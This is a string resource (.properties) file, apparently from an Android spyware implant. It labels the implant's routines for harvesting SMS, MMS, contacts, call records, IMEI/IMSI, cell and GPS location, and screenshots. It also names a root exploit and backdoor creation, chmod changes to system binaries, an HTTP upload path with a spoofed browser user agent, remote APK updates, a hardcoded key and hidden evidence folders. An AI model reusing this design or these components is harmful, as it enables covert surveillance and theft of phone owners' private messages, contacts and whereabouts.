SmsAction.0=IMSI: 
SmsAction.1=SID: 
SmsAction.11=IMSI: 
SmsAction.13=Sms type: 
SmsAction.14=\ number: 
SmsAction.15=\ text: 
SmsAction.2=, NID: 
SmsAction.3=, BID: 
SmsAction.4=CC: 
SmsAction.5=, MNC: 
SmsAction.6=, LAC: 
SmsAction.7=, CID: 
SmsAction.8=Cell and GPS info not available
SmsAction.9=IMEI: 
UninstallAction.0=package:com.android.service
HttpKeepAliveTransport.0=User-Agent
HttpKeepAliveTransport.1=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
HttpKeepAliveTransport.2=Content-Type
HttpKeepAliveTransport.3=application/octet-stream
HttpTransport.0=http://
HttpTransport.1=:
HttpTransport.10=application/octet-stream
HttpTransport.2=/wc12/webclient
HttpTransport.3=content-type
HttpTransport.4=set-cookie
HttpTransport.5=content-length
HttpTransport.6=application/octet-stream
HttpTransport.7=User-Agent
HttpTransport.8=Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3
HttpTransport.9=Content-Type
Protocol.0=core-update
Protocol.1=New configuration received
Protocol.2=application/vnd.android.package-archive
ZProtocol.0=<html>
ZProtocol.1=SHA1PRNG
AgentCallList.0=u
AgentCallList.1=no notes
AgentCrisis.0=Crisis started
AgentCrisis.2=Crisis stopped
AgentDevice.11=cpuTotal: 
AgentDevice.13=cpuIdle: 
AgentDevice.15=root: yes\n
AgentDevice.16=root: no\n
AgentDevice.17=-- PROPERTIES --\r\n
AgentDevice.21=/proc/stat
AgentDevice.3=-- SYSTEM --\r\n
AgentDevice.4=IMEI: 
AgentDevice.6=IMSI: SIM not present\n
AgentDevice.7=IMSI: 
AgentDevice.9=cpuUsage: 
AgentMessage.1=MMS Subject: 
AgentMessage.2=local
AgentMessage.3=local
AgentSnapshot.1=Desktop
AgentSnapshot.2=/system/bin/ntpsvd fb
AgentSnapshot.3=frame
GPSLocator.0=LocationThread
MmsBrowser.0=content://mms/sent
MmsBrowser.1=content://mms/inbox
MmsBrowser.10=_id
MmsBrowser.11=content://mms
MmsBrowser.12=addr
MmsBrowser.13=insert-address-token
MmsBrowser.16=_id
MmsBrowser.17=thread_id
MmsBrowser.2=address
MmsBrowser.3=contact_id
MmsBrowser.4=charset
MmsBrowser.5=type
MmsBrowser.6=type=137
MmsBrowser.8=sub
MmsBrowser.9=date
SmsBrowser.0=content://sms/inbox
SmsBrowser.1=content://sms/sent
SmsBrowser.10=status
SmsBrowser.11=type
SmsBrowser.12=reply_path_present
SmsBrowser.13=service_center
SmsBrowser.2=body
SmsBrowser.3=address
SmsBrowser.4=date
SmsBrowser.5=yields _id
SmsBrowser.6=thread_id
SmsBrowser.7=person
SmsBrowser.8=protocol
SmsBrowser.9=read
SmsReceiver.1=pdus
SmsReceiver.2=SMS from 
Contact.0=User Id: 
Contact.1=\nComplete Name: 
Contact.11=State: 
Contact.12=\nCountry: 
Contact.13=\nCity: 
Contact.14=\nStreet: 
Contact.15=\nPO Box: 
Contact.16=\nZip: 
Contact.17=\nNeighbor: 
Contact.18=\nAddress Type: 
Contact.2=\nNickname: 
Contact.20=IM: 
Contact.21=\nIM Type: 
Contact.23=Company Name: 
Contact.24=\nCompany Title: 
Contact.25=\nCompany Type: 
Contact.27=Website: 
Contact.3=\nUserNote: 
Contact.5=Phone: 
Contact.6=\nPhone Type: 
Contact.8=Email: 
Contact.9=\nType: 
Configuration.0=AGENTCONFS-
Configuration.1=EVENTCONFS-
Configuration.2=MOBILCONFS-
Configuration.3=ENDOFCONFS-
Configuration.4=1
Configuration.5=2
Configuration.6=3
Crypto.0=AES
Crypto.1=AES/CBC/NoPadding
Encryption.0=SHA-1
Keys.0=9774d56d682e549c
SHA1Digest.0=SHA-1
EvidenceCollector.0=.mob
EvidenceCollector.1=Z
EvidenceCollector.2=Z*
EvidenceCollector.3=pr_80
EvidenceCollector.4=.dat
EvidenceCollector.5=l_
EvidenceCollector.6=0000
Directory.0=$dir$
Path.0=cdd/
Path.1=msdd/
Path.2=ldd/
Path.4=/
Path.5=.LOST.FILES/
SmsHandler.0=content://sms
BroadcastMonitorSms.0=pdus
BroadcastMonitor.0=com.android.service.app
Call.0=\ incoming: 
Call.1=\ ongoing: 
Call.2=\ 
CellInfo.0=MCC: 
CellInfo.1=\ MNC: 
CellInfo.2=\ LAC: 
CellInfo.3=\ CID: 
CellInfo.4=SID: 
CellInfo.5=\ NID: 
CellInfo.6=\ BID: 
Core.0=T
Core.1=Started
Core.2=Invalid new configuration, reverting
Core.3=New configuration activated
Core.4=Actual configuration corrupted
Device.0=sdk
Device.1=UNAVAILABLE
Device.10=cdma or not?
Device.11=\ info: 
Device.4=N/A
Device.6=\ Error: 
Device.7=null cell
Device.8=gprs or not?
Device.9=\ info: 
ServiceCore.0=None
ServiceCore.1=Backdoor Created
ServiceCore.10=\ vol
ServiceCore.11=\ rt
ServiceCore.12=Root exploit
ServiceCore.13=exploit failed\!
ServiceCore.14=\ air
ServiceCore.2=/system/bin/ntpsvd
ServiceCore.3=Backdoor Destroyed
ServiceCore.4=errorlog
ServiceCore.5=statuslog
ServiceCore.6=statusdb
ServiceCore.7=/system/bin/chmod 755 
ServiceCore.8=/system/bin/chmod 755 
ServiceCore.9=/system/bin/chmod 666 
SystemPropertiesProxy.0=getInt
SystemPropertiesProxy.1=getLong
SystemPropertiesProxy.2=getBoolean
SystemPropertiesProxy.3=set
SystemPropertiesProxy.4=/system/app/Settings.apk
DateTime.0=yyMMdd-HHmmss
WChar.0=UnicodeLittleUnmarked
WChar.2=UnicodeLittleUnmarked
